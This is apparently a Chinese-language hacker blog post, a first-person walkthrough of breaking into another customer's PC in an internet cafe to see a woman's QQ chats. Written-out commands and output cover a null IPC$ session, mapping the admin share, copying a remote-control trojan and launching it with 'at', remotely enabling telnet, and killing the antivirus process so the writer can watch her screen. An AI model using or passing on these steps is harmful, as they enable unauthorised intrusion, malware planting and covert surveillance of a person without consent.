好久都没来网吧了,今天一朋友来找我。外面有下着雪,实在没地方玩,又给溜进了网吧……
在以前家里没买电脑时。整天都泡这网吧,所以对他的系统设置什么还了解点,都大半年没来了……不知道有啥变化……
这网吧还不错.别的网吧都是无盘的或者就是98的.这里98和2000都有,呵.,搞入侵可方便了……
无意的看到13号坐着两mm,嘻.……入侵也由此开始了,看能不能拿到mm的qq号……偶也找了一2000系统的机器做下,(偶找了一角落.呵.这样比较安全点..)
打开偶可爱的cmd..先net name下看看本机情况
wanglu05
user2000
命令成功完成。
我本机名是wanglu05.ping下看看ip有无什么规则
pinging wanglu05 [192.168.0.13] with 32 bytes of data:
reply from 192.168.0.13: bytes=32 time<10ms ttl=64
reply from 192.168.0.13: bytes=32 time<10ms ttl=64
reply from 192.168.0.13: bytes=32 time<10ms ttl=64
reply from 192.168.0.13: bytes=32 time<10ms ttl=64
ip是改了.记的以前是有一种规则的.比如我5号把.内网ip就是192.168.0.5.
这次mm在13号..ip就不能猜了...不过网吧机器名可是一样的...有路了.
pinging wanglu13 [192.168.0.225] with 32 bytes of data:
reply from 192.168.0.225: bytes=32 time<10ms ttl=128
reply from 192.168.0.225: bytes=32 time<10ms ttl=128
reply from 192.168.0.225: bytes=32 time<10ms ttl=128
得到内网ip是192.168.0.225...偶记的以前是存在默认共享的..这次换了网管不知道他有没做防范措施....从这入手....
net use //192.168.0.225/ipc$ "" /user:"" 空连接成功..说明ipc$默认共享还在...
只是没权限...网吧的登陆用户全是一样的.而且密码为空.又让我给钻了空子.
g:/>net use //192.168.0.225/ipc$ "" /user:"user04"
命令成功完成。

如图1.
网吧系统盘为g盘.接着映射对方g盘为我本地z盘.
g:/>net use z: //192.168.0.225/g$
命令成功完成。

如图2
现在我的电脑里多了一个z盘...图3.
现在我们在这个z盘里新建或删除文件.也就等于在192.168.0.225这个机器上操作了...
这些相信大家都知道的吧..我就不废话了..当然这些还不是我们想要的...要进一步控制她.然后拿到qq号.^_^........表说我坏....
下面来copy一个木马客户端上去先...由于只是看qq而已...所以我找了一个
web控制台.体积没多大,205kb..下面是关于webserver的介绍./../
web控制台
一个直接在ie栏里输入对方ip就可以控制对方机器的小软件,也就是所谓的b/s模式的控制。用起来很方便,对方运行了服务端后,你在ie栏里直接输入对方ip就可以控制了,也可以通过刷新来实现重复抓屏。
可以在我网络盘里下到
http://fhod.ys168.com
综合工具里有个 webserver.rar
接着
g:/>copy webserver.exe //192.168.0.225/admin$
已复制 1 个文件。
g:/>net time //192.168.0.225
//192.168.0.225 的当前时间是 2005/2/5 下午 05:00

图4
g:/>at //192.168.0.225 17:02 webserver.exe
用at命令启动webserver.exe.
2分钟过后.在ie里输入192.168.0.225.就可以控制对方了...可是偶一会用net time查看时.都已经过了3分钟了.还是打不开....后来又重新来了一次.眼睛就盯着mm的屏幕看,才发现到了我指定的时间.程序执行时.被瑞星给杀了...
ft....我说那.
难道就没办法了吗...当然不是...可以换个别的马或加壳.修改它特征码什么的.但在网吧工具也不是很齐全.我也懒的下..
还好微软为我们提供了一个非常不错的系统工具....也算的上是一类控制软件了...
打开控制面板--管理工具--计算机管理
操作-连接到另一计算机.
然后输入ip192.168.0.225

图5
呵.等一会就可以看到成功了...你看到了什么?
更爽的是我们可以远程开启他的服务...在这里启动他的telnet服务.

图6
ok了...
本地打开一cmd
输入
g:/>telnet 192.168.0.225
回车后出现
server allows ntlm authentication only
server has closed connection

图7
需要ntml认证的...用小榕的那个ntml.exe就可以解决这一问题.
ntlm.exe在《流光》的tools目录中有的...
没工具怎么办呢..
我们在本地添加一和远程主机同样的用户名
输入
net user user04 /add 添加user04密码为空的用户
net localgroup administrators user04 /add 把user04加入管理员组
然后来到g:/winnt/system32下找到cmd.exe
右击.创建快捷方式.然后在快捷方式 cmd右击..属性.
在以其他用户身份运行前打勾...

图8
然后运行
快捷方式 cmd
弹出窗口.在用户名处输入user04密码为空

图9
然后
telnet 192.168.0.225
回车..哈哈...拿到shell了....
接下来的事就好办了...去黑基down了一个knlps 命令行下杀进程的东东
copy上去././然后telnet上去.在cmd下执行...杀掉了瑞星的进程
这下把瑞星给关了.还怕他提示有毒
接着执行webserver.exe
在ie里输入
192.168.0.225

图10
看到了.挖卡卡..开心...点那个查看屏幕..呵..mm正在聊天...
好了她的qq号码也拿到手了..加了她去聊聊去....